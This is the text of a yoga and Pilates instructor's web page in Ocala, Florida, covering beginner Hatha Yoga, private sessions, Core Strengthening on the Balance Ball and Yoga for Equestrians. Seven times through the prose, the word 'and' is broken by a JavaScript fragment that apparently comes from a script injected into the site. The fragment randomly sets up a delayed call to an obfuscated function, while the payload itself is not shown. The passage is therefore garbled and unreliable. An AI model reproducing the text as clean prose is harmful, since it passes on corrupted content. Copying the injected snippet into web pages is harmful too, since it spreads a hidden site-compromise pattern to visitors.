Hatha Yoga

I bring beginners into a safe practice assisting them in building a yoga practice that meets their level of fitness andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and mobility, which we challenge appropriately as the student progresses. I strive to teach my students proper alignment in each asana, providing modifications if when a student requires it. Pranayama is an important function to developing a solid Yoga practice; therefore, breathing is an important key in my instruction as well.

I offer private Yoga sessions that focus on the individual. Many students prefer the individual instruction because of the privacy andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and because their degree of focus on their practice is enhanced by one-on-one instruction. Others prefer to begin their practice with private instruction so they feel more confident in a large class setting. Yoga is the gift you give yourself, that keeps on giving.

I teach several group Yoga classes; however, it is not ‘gym’ yoga. Whether I am teaching one person or several, I strive to maintain a very intimate atmosphere. Pilates

But after becoming a dedicated student of the method, I soon discovered how Pilates complements my Yoga practice. I also believe that it is important to offer a variety of fitness modalities to my students because each student is unique. The exercises of Pilates may resonate with one student, when Yoga does not. My mat Pilates classes use the Balance Ball to engage Core Muscles throughout the routine but also return to the mat for traditional mat Pilates exercises. Core Strengthening

Core Strengthening class finds its roots in  Pilates, but with a concentration on Core work andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and all over muscle toning progression of exercises on the Balance Ball, targeting all the major muscle groups while engaging the Core the entire 60 to 90 minutes. Private sessions are also tailored to the individuals specific health/fitness needs. Once I strengthened my core all pain disappeared! After teaching Chair Yoga for two years, I began to realize that many of my students needed more CORE STRENGTHENING. Yogalates

Yoga for Equestrians

When I first began my yoga practice  I was a full time Exercise Rider. The reason I began Yoga was to maintain my fitness during the summer months when the majority of the horses left the farms here in Ocala, Florida to go to the racetracks around the United States. In late September andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and early October the horse farms would begin to break andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and train the new crop of Yearlings. The Yearlings all turn two on January 1 andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and breaking them for the January sales was an annual event on the local farms. Wanting to stay in the best physical condition to be able to stay with the new ‘babies’ I began Yoga, I had no idea how positively Yoga would impact my riding.
